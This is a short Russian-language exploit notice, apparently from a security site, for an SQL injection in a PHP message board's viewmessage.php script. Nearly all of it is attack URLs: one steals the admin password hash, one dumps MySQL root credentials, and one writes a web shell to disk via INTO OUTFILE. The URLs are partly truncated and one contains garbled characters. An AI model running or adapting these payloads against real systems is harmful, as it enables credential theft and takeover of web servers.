Уязвимость позволяет получить DES-хеш любого пользователя, создать веб-шелл, получить доступ к важной служебной информации. Использование:

Получение хеша пароля:
http://target/viewmessage.php?Cat=&m...om%20w3t_Users where U_Username='admin'

Получение учетных записей к БД:
http://target/viewmessage.php?Cat=&m...m%20mysql.user where User='root'

Создание веб-шелла (при наличии прав на запись):
http://target/viewmessage.php?Cat=&m...�б_шелла into outfile 'path_to_file/file.php'

Источник: www.cyberlords.net